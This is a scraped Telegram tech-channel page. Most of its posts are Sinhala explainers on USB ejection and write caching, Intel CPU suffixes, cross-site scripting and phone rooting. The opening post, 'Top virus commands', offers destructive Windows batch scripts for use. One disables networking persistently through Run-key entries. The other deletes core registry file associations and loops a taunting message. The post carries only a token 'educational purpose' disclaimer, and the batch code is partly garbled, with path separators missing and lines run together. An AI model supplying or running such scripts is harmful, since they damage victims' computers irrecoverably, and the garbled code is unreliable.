ℭ𝔲𝔯𝔰𝔢𝔡 ℭ𝔬𝔡𝔢 ⁶⁶⁶ 🇱🇰
前往频道在 Telegram
"Beyond the Firewall🔥. Beneath the Surface." 🇱🇰 Big Brain 🧠 Community Ahead >> ~ සිරි ලන්කන් Alice 👾 ⭕️Main chanel ㅤ @cursed_code ⭕️Discussion ㅤ @cursed_code_chat ⭕️Cloud ㅤ @backup_yo ⭕️Official Books @behind_the_scene_book
显示更多无数据
订阅者
+324 小时
+437 天
+22230 天
帖子存档
🦠 Top virus commands
🟣1. Disable Internet Permanently
:-
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
🃏Action :- This code will disable the internet connectivity permanently.
🟣2. Delete Key Registry Files
:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE
🃏Action :- This will delete key registry files, then loops a message
This is dangerous and unrecoverable Notepad Virus.
This is for educational purpose only🔰Save All With Extension . bat ⚠️Note :- We Are Not Responsible For Any Damaged Of Your Computer #tricks #virus #code #malware
P05
දැන් අපේ මූලික ප්‍රශ්නය වුණු Eject කියන option එක ගැන කතා කලොත්, අපි eject කියන option එක click කළ සැනින්, මම අර කලින් කියපු RAM එකේ තියාගෙන ඉන්න data හැම දෙයක්ම අදාල drive එකට write කරලා, අදාල drive එකත් එක්ක තියන සම්බන්ධතා නවත්වන්න operating system එක කටයුතු කරනවා.
ඒ හැම දෙයක්ම ඉවර වුණාට පස්සේ තමයි අපි නිතරම දකින් මේ message එක අපිට පෙන්වන්න operating system එක විසින් කටයුතු කරන්නේ.
ඉතින් ඔයා Windows භාවිතා කරන කෙනෙක් වුණත්, Linux හෝ macOS භාවිතා කරන කෙනෙක් වුණත් දැනගෙන ඉන්න ඕන දේ තමයි, ඔයාගේ data ඇත්තටම වටිනවා නම්, අමතර click දෙකක් සහ තත්ත්පර කිහිපයක් වැය කරලා මේ eject option එක භාවිතා කරන එක වැදගත් වෙනවා.
ඒ වගේම අදාල drive එකේ තියෙන් LED light එක ගැන අවධානයෙන් ඉන්නවා නම් මේ device එක මේ මොහොතේ system එක විසින් භාවිතා කරනවා ද නැද්ද කියන එක ගැන දළ අදහසක් ගන්නත් පුළුවන්.
දැන් ඔයාට මේ eject කියන option එක ගැන වගේම ඒක වැදගත් වෙන්නේ ඇයි කියන එක ගැන සරළ අදහසක් එන්න ඇති කියලා මම විශ්වාස කරනවා.
End
Share ❤️ @the_exit_node
P04
ඉතින් මේ Write caching කියන technology එකෙන් අන්න ඒ දේ තමයි වෙන්නේ. කොහොම වුණත් Windows වලදී මේ option එක default setting වලදී disable කරලා තමයි තියෙන්නේ. ඒක නිසා Windows පරිගණකයකදී flash drive එකක් ගලවන්න උත්සාහ කලොත් ටිකක් අඩු විදිහේ data corruption එකකට තමයි සම්භාවීතාවයක් තියෙන්නේ.
නමුත් Linux හෝ macOS වගේ එකකදී මේක ටිකක් වෙනස්. මොකද මේ Write Caching කියන technology එක මේ operating system වලදී default විදිහටම enable වෙලා තමයි තියෙන්නේ.
සමහර වෙලාවට ඔයා Linux භාවිතා කරනවා නම් අත්දැකීමෙන්ම දන්නවා ඇති file එකක් copy වෙලා ඉවර බව operating system එකෙන් පෙන්නුවත්, අපි ඒ වෙලාවෙම අදාල drive එක ගලවන්න උත්සාහ කලොත් අදාල file එක corrupt වෙලා තියනවා.
ඒ වගේම හොඳින් නිරීක්ෂණය කලොත් ඔයාට දකින්න පුළුවන් වේවි file copy dialog එක close වුණාට පසුවත්, flash drive එකේ තියන LED light එක blink වෙනවා. මේ light එක blink වෙනවා කියන්නේ මේ drive එක තවමත් operating system එක විසින් භාවිතා කරනවා කියන අදහසයි.
P03
සාමාන්‍යයෙන් Windows පරිගණක වලදී flash drive එකක performance වැඩි කරගැනීම සඳහා Write Caching කියන technology එකක් භාවිතා වෙනවා. මේකෙදි වෙන්නේ ඔයා program කිහිපයකින් drive එකේ තිබෙන file කිහිපයක් open කරගෙන ඉන්නවා නම්, අදාල files save කිරීම වේගවත් කරන්න මේ file වලට කරන වෙනස්කම් RAM එකේ ගබඩා කරගෙන, අවසානයේ ඒ data ටික transfer කරන්න හොඳ වෙලාවක් ආවම අදාල drive එකට write කරන එකයි.
හිතන්න ඔයා PowerPoint presentation එකක් සහ Word document එකක් එක වර open කරගෙන ඉන්නවා කියලා. ඉතින් මේ file දෙකම එකම වෙලාවේ save කලොත් එක වරකට එක file එක බැගින් file දෙක වෙන වෙනම save කරන්න operating system එකට සිද්ධ වෙනවා.
Flash drive එකකට වඩා RAM එකක් ගොඩක් speed වැඩි නිසා, මේ file දෙක drive එකෙන් RAM එකට copy කරගෙන තියාගෙන ඉන්නවා නම් මේ save කරන්න ගත වෙන කාලය ගොඩක් improve කරන්න පුළුවන් වෙන බව ඔයාට පැහැදිලි වෙනවා ඇති.
P02
කොහොම වුණත් මේ ගැන තාක්ෂණික උපදෙස් දෙන කෙනෙකුගෙන් අදහස් විමසුවහොත් කියන්නේ "අපි මොනවාහරි drive එකට copy කරනවා නම්, ඒ දත්ත corrupt වෙන්න පුළුවන්"🤓 කියන කාරණය වුණත් ඒ වෙලාවට අපේ ඔළුවට එන ප්‍රධාන ප්‍රශ්නය වෙන්නේ, "අපි මොනවත් copy කරන්නේ නැත්නම්, මේක ගැලෙව්වට කමක් නැද්ද?"🤔 කියන එක බව අමුතුවෙන් කියන්න ඕන නැහැ.
මේක හරියටම තේරුම් ගන්න අපිට operating system එකක් මේ විදිහේ drive එකක් එක්ක කටයුතු කරන ආකාරය පිළිබඳව දළ අදහසක් තියෙන්න ඕන.
P01
අපි පරිගණයකය operating system එකේ දකින Eject (mass storage device) කියන option එක හරහා ඇත්තටම ඒ device එක පරිගණකයෙන් භෞතිකව විසන්ධි වෙන්නේ නැති බව අපි හැමෝම දන්නවා.
ඉතින් ඇත්තටම මේ option එක හරහා වෙන්නේ, සරළව අපි operating system එකට කියනවා මේ device එකත් එක්ක තියන සියළුම වැඩ ඉවර කරලා, සම්බන්ධතා නවත්තලා මේක ඇත්තටම, ඒ කියන්නේ භෞතිකව විසන්ධි කරන්න (ගලවන්න) පුළුවන් තත්ත්වයට අරගෙන එන්න කියලා.
USB Drive එකක් ගැලවීමට පෙර eject කිරීම පිටුපස ඇති තාක්ෂණික හේතුව ගැන දැනගමු.
Flash Drive එකක් එහෙමත් නැතිනම් හැමෝම දන්න විදිහට Pen drive එකක් ගලවන්න කලින් eject කරන්න ඕනද? කියන එක අපි හැමෝටම තියන ගැටළු වලින් එකක්.
මේ ප්‍රශ්නය කිහිපදෙනෙකුගෙන් ඇහුවොත්, ගොඩක් වෙලාවට ඕන කෙනෙක් කියන්නේ, "කිසි අවුලක් නෑ, මම කවදාවත් eject කරන්නේ නෑ"🤭 වගේ උත්තරයක්. ඒ වුණත් එහෙනම් ඇයි ඒ වගේ option එකක් Operating System වල තියෙන්නේ?😐 මෙන්න මේ ගැන තමයි අද අපි කතා කරන්න යන්නේ.
#ejecting #flshdrive #pendrive #post
— A to Z About XSS —
Overview:
Cross-Site Scripting (XSS) ප්‍රහාරය යනු අනිෂ්ට සහ විශ්වාසදායී වෙබ් අඩවිවලට අනිෂ්ට ස්ක්‍රිප්ට් එන්නත් කරන එන්නත් වර්ගයකි. XSS ප්‍රහාර සිදු වන්නේ ප්‍රහාරකයෙකු අනිෂ්ට කේතයක්, සාමාන්‍යයෙන් බ්‍රවුසරයේ පැති ස්ක්‍රිප්ට් ආකාරයෙන්, වෙනත් අවසාන පරිශීලකයෙකුට යැවීමට වෙබ් යෙදුමක් භාවිතා කරන විටය. මෙම ප්‍රහාරයන් සාර්ථක වීමට ඉඩ සලසන දෝෂ තරමක් පුලුල්ව පැතිරී ඇති අතර වෙබ් යෙදුමක් එය වලංගු කිරීම හෝ කේතනය කිරීමකින් තොරව උත්පාදනය කරන ප්‍රතිදානය තුළ පරිශීලකයෙකුගෙන් ආදානය භාවිතා කරන ඕනෑම තැනක සිදු වේ. ප්‍රහාරකයෙකුට අනිෂ්ට ස්ක්‍රිප්ට් එකක් සැක නොකරන පරිශීලකයෙකුට යැවීමට XSS භාවිතා කළ හැක. අවසාන පරිශීලකයාගේ බ්‍රවුසරයට ස්ක්‍රිප්ට් විශ්වාස නොකළ යුතු බව දැන ගැනීමට ක්‍රමයක් නොමැති අතර, ස්ක්‍රිප්ට් ක්‍රියාත්මක කරයි. ස්ක්‍රිප්ට් පැමිණියේ විශ්වාසදායක මූලාශ්‍රයකින් යැයි එය සිතන නිසා, අනිෂ්ට ස්ක්‍රිප්ටයට බ්‍රවුසරය විසින් රඳවාගෙන ඇති සහ එම වෙබ් අඩවිය සමඟ භාවිතා කරන ඕනෑම කුකීස්, සැසි ටෝකන හෝ වෙනත් සංවේදී තොරතුරු වෙත ප්‍රවේශ විය හැක. මෙම ස්ක්‍රිප්ට් වලට HTML පිටුවේ අන්තර්ගතය පවා නැවත ලිවිය හැක.
#tutorial #tricks
USB Drive එකක් ගැලවීමට පෙර eject කිරීම පිටුපස ඇති තාක්ෂණික හේතුව ගැන
P05
Suffix XE
Intel සමාගම විසින් සාමාන්‍යය පරිගණක සඳහා මෙතෙක් නිෂ්පාදනය කෙරුණු, හොඳම processor මාදිලි වල දකින්නට ලැබෙන මේ X suffix එක මගින් නිරූපණය වන්නේ අදාල CPU එක Extreme Edition එකක් බවයි. (මෙහි අන්තර්ගත වන E අකුරින් ECC Memory එක ගැන අදහසක් නිරූපණය නොවේ.)
🔍
ඉතින් ඔයා පරිගණකයක් මිලදීගැනීමට සූදානම් වෙනවා නම් හෝ තමන්ගේ පරිගණකයේ ඇතුලත් වන CPU එක වඩාත්ම සුදුසු වන්නේ මොන වගේ tasks සිදු කරගැනීමට ද යන්න අවබෝධ කරගැනීමට අවශ්‍යය නම්, අනිවාර්යයෙන්ම මේ model number එක අවසානයේ ඇති අකුරු ගැන විශේෂ අවධානයක් යොමු කළ යුතු වෙනවා.
ඒ වගේම ark.intel.com එකට ගිහින් එකේ තිබෙන Search පහසුකම භාවිතා කර, තමන් මිලදීගැනීමට සූදානම් වන CPU එකේ තිබෙන Cores ගණන, Threads ගණන, Cache Memory එක වගේම මේ Processor එකට අදාලව Turbo Boost වැනි පහසුකම් තිබෙනවාද යන්න ගැන පරීක්ෂා කිරීමට අමතක කරන්න එපා.
😜
End
Share @the_exit_node ❤️
+1
P04
Suffix T
මේ T කියන suffix එක සහිත CPU මාදිලි පැරණි LGA socket වලට ගැලපෙන ලෙස නිර්මාණය කර ඇති අතර මේවා සාමාන්‍යය desktop CPU වලට වඩා අඩු විදුලි බලයක් භාවිතා කරන ලෙස සකස් කර තිබෙනවා.
මේ ආකාරයේ CPU බොහෝ වෙලාවට All In One PC වැනි devices වල දැකගැනීමේ හැකියාව ලැබෙනවා.
Suffix P
P කියන suffix එක අන්තර්ගත වන CPU මාදිලි වල Integrated graphics, එහෙමත් නැතිනම් on-board graphics කියන නමින් සාමාන්‍යයෙන් හඳුන්වන පහසුකම අන්තර්ගත වන්නේ නැහැ. ගොඩක් වෙලාවට අපි මොන processor එක ගත්තත්, GPU එකක් වෙනම සවි කරනවා නම් Integrated graphics වලින් වැඩක් නෑ වගේම මේ හරහා ඊට අදාල මුදල ඉතිරි කරගැනීමටත් අපට අවස්ථාව ලැබෙනවා.
ඒ වගේම අගට G suffix එක එකතු වෙනවා නම්, මේ processor එකත් සමඟ AMD Radeon graphic chip එකක් එයට අන්තර්ගත වෙනවා.
P03
Suffix U & Y
මේ U අකුරින් අදහස් වන්නේ Ultra Low Power වන අතර Y අකුරින් නිරූපණය වන්නේ Extremely Low Power කියන අදහසයි (Y වෙනුවට E යොදාගෙන නැති හේතුව ගැන සිතනවා නම්, E යොදාගෙන තිබෙන්නේ ECC Memory සඳහා සහාය දක්වන CPU නිරූපණය කිරීමටයි).
මේ U සහ Y අකුරු සහිත CPU මාදිලි වැඩි වශයෙන්ම performance වලට වඩා, battery saving ගැන focus කරමින් නිර්මාණය කිරීමට කටයුතු කර තිබෙනවා. ඉතින් මේ processors අඩංගු devices වල performance අඩු වුණත්, battery එක බහින්නේ ඉතාමත් අඩුවෙනුයි
P02
Suffix H & Q
මේ H කියන අකුර ගොඩක් වෙලාවට දකින්න ලැබෙන්නේ Q කියන අකුරත් එක්කමයි. ඒත් H කියන්නේ High Performance Graphic තිබෙන බව වගේම මේ වෙනුවෙන් power එක භාවිතා කරන ප්‍රමාණය වැඩි වෙනවා.
ඒ වගේම Q කියන අකුරින් අදහස් වෙන්නේ Quad Core කියන අදහසයි.
ඒ වගේම මේ වර්ගයේ processors ටිකක් මිලෙන් වැඩියි. (ඔයා මේ Q suffix එක තිබෙන i7 processor එකක් මිලදී ගන්නවා නම්, එහි අන්තර්ගත වෙන්නේ CPU cores 4ක් පමණක් බව දැකගතහැකි වේවි.)
මීට අමතරව Intel සමාගම විසින් M අකුර භාවිතා කර තිබෙන්නේ ඔවුන්ගේ Mobile processors හැඳින්වීමට වන අතර සමහර අවස්ථා වලදී Intel i7-4700MQ වැනි මාදිලි වලදී M අකුරින් Mobile යන්නත්, Q අකුරින් Quad Core යන්නත් නිරූපණය වෙනවා
P01
Suffix K
ඔයා තෝරගන්න CPU එකේ model number එකේ අගට K අකුර ඇතුලත් වෙලා තිබෙනවා නම්, එහි තේරුම මේ processor එක Unlocked, එහෙමත් නැතිනම් over-clock කිරීම සඳහා හැකියාව ලබා දී තිබෙන බවයි. අනෙකුත් processor ද over-clock කිරීමේ හැකියාව තිබෙන නමුත්, ඒවා overclock කළ හැකි ප්‍රමාණය ඉතාමත් සීමා සහිත වන නමුත් මෙම processor එක එවැනි සීමාවන්ගෙන් තොර වෙනවා.
Intel CPU වල Model Number එකේ අග තිබෙන අකුරු එහෙමත් නැතිනම් Suffix වල තේරුම දැනගමු.
බොහෝ වෙලාවට අපි Laptop පරිගණකයක් හෝ සාමාන්‍යය Desktop පරිගණකයක් මිලදීගැනීමේදී සැළකිලිමත් වන දේවල් වලින් එහි තිබෙන Processor එක, එහෙමත් නැතිනම් CPU එකට ප්‍රධාන ස්ථානයක් හිමි වෙනවා.
ඉතින් මේ CPU එකක් තෝරාගැනීමේදී ප්‍රධාන වශයෙන්ම වැඩි දෙනෙකුගේ තේරීම වෙන්නේ Intel Processor එකක් වන නමුත් තමන් මිලදීගැනීමට සූදානම් වන processor එක හරියටම තමන් කරන්න යන වැඩත් එක්ක ගැලපෙනවාද නැද්ද යන්න තේරුම් ගැනීමට නම්, processor model එකේ අගින් තිබෙන අකුරු පිළිබඳව සැළකිලිමත් වෙන්න අපිට සිදු වෙනවා.
මේ model number එකේ අග තිබෙන අකුරු අහඹු ලෙස එයට එකතු කරනු ලැබූ අකුරු නොවන අතර මේ අකුරු වලින් අදාල processor එක ගැන තොරතුරු රැසක් නිරූපණය කිරීමට Intel සමාගම කටයුතු කරනවා.
Intel Core i3, i5 සහ i7 වැනි මාදිලි වලින් වටිනාකමින් වැඩි ඉලක්කම හිමි මාදිලිය වැඩියෙන් powerful කියලා හිතාගෙන හිටියත්, model number එකේ අවසානයට තිබෙන අකුර අනුව එය බොහෝ වෙලාවට වෙනස් වෙනවා.
#cpu #processor #post
Repost from ℭ𝔲𝔯𝔰𝔢𝔡 ℭ𝔬𝔡𝔢 ⁶⁶⁶ 🇱🇰
Please share this channel with your tech lovers. ❤
> https://t.me/The_exit_node
P04
Jailbreak කිරීමට ක්‍රම කිහිපයක් ඇති අතර සමහර විටෙක ඔබ අලුත්ම iOS version එකක් භාවිතා කරනවා නම් සමහර විටෙක ඒ සඳහා Jailbreak කිරීමේ ක්‍රමවේදයක් තවමත් නොතිබිය හැකි වෙනවා.
එමෙන්ම Root කිරීමේ කටයුත්ත ද විවිධ ජංගම දුරකථන මාදිලි සඳහා සිදු කළ යුතු ක්‍රමයන් වෙනස් වුවත්, පොදුවේ ගත් කළ,Bootloader එක unlock කිරීම TWRP හෝ ClockworkMod වැනි custom recovery එකක් flash කිරීම
SuperSu හෝ Magisk වැනි rooting ක්‍රමවේදයකට අදාල zip file එකක් ලබාගෙන එය පෙර සඳහන් කළ recovery එක භාවිතා කරමින් flash කරගැනීම පෙන්වා දිය හැකි අතර, Samsung වැනි ජංගම දුරකථන වලට Odin වැනි මෘදුකාංගයක් භාවිතා කරමින් ඉතාමත් පහසුවෙන්ම root කළහැකි ක්‍රමවේදයන් ද, KingRoot වැනි apps භාවිතා කරමින් Root කිරීමේ හැකියාව ද පවතින නමුත්, KindRoot වැනි ක්‍රමවේදයන් භාවිතා නොකරන තරමට හොඳ වන්නේ ඒ මගින් තවත් bloatware තොගයක් අපගේ අවසරයකින් තොරව install කරවන බැවිනි.
මේ සඳහා සාමාන්‍යය මට්ටමේ තාක්ෂණික දැනුමක් අවශ්‍යය වන අතර, මේ දැනුම XDA-Developers වැනි forums හරහා පහසුවෙන්ම ලබාගත හැකි අතර ඉතිරි සියල්ලටම Google search engine එක භාවිතා කළ හැකි වෙනවා.End
❤️ @the_exit_node
